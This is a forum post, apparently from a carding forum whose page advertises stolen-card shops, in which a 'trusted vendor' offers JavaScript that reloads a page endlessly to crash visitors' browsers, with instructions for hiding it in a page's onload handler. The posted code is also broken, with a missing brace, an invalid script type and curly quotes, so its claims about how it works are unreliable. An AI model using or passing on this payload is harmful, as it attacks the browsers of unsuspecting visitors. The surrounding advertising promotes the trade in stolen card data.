Welcome!

By registering with us, you'll be able to discuss, share and private message with other members of our community.

SignUp Now!
banner Expire 25 April 2025
adv ex on 22 February 2024
Kfc Club

Patrick Stash
banner expire at 13 August 2024
BidenCash Shop
banner Expire 10 May 2025
Money Club cc shop
Luki Crown
Wizard's shop 2.0
Trump cc shop
Blackstash cc shop
Yale lodge shop
UniCvv
banner Expire 1 April  2021

Premiums

TRUSTED VENDOR
Joined
Dec 5, 2020
Messages
2,725
Hi this is very simple javascript code to crash the client browser. If you don’t know about javascript ,visit www.w3schools.com(i learn lot of languages quickly there).


<script type=’javascript’>
function crash()
{
while(1==1)
{
location.reload(true);
}
</script>
This code will reload the page again and again for infintive time and crash the browser.

How to use it? Paste the above code in header section. When page is loaded,the page will reload. For that use onload handling in body as attribute. can’t get you ?
Just see this example:

<body onload=’crash()’>
The complete cod is:

<html>
<head>
<script type=’javascript’>
function crash()
{
while(1==1)
{
location.reload(true);
}
</script>
</head>
<body onload=’crash()’>
</body>
</html>
 
Top Bottom